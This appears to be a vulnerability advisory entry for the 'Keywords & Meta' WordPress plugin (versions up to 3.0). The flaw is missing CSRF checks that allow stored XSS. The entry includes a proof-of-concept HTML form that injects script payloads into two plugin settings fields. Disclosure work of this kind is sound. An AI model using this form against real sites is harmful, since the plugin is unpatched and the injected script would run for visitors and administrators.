Keywords & Meta <= 3.0 - CSRF to Stored Cross-Site Scripting (XSS)
Description
The plugin does not sanitise of escape its settings before outputting them back in the page after they are saved, allowing for Cross-Site Scripting issues. Furthermore, it is also lacking any CSRF check, allowing attacker to make a logged in high privilege user save arbitrary setting via a CSRF attack. Versions 3.1 & 3.2 added sanitisation/escaping, but still missing CSRF, the plugin has been permanently closed.
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=keyword-meta%2Fkeyword-meta.php" method="POST">
<input type="hidden" name="keywords_add" value="0" />
<input type="hidden" name="keywords_edit" value="" />
<input type="hidden" name="description_edit" value="</textarea><script>alert(/XSS-Desc/)</script>" />
<input type="hidden" name="og_enable" value="0" />
<input type="hidden" name="og_type_edit" value="0" />
<input type="hidden" name="og_title_all" value="0" />
<input type="hidden" name="og_url_edit" value="0" />
<input type="hidden" name="og_image_edit" value="0" />
<input type="hidden" name="og_image_all" value="0" />
<input type="hidden" name="apple_icon_edit" value="0" />
<input type="hidden" name="android_icon_edit" value="0" />
<input type="hidden" name="mobile_restrict_viewport" value="0" />
<input type="hidden" name="google_verify_edit" value='"><script>alert(/XSS-Goole-Code)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Genubhau wayal
Submitter
Genubhau Wayal
Verified
Yes
Timeline
Publicly Published
2021-08-09 (about 2 months ago)
Added
2021-08-09 (about 2 months ago)
Last Updated
2021-08-09 (about 2 months ago)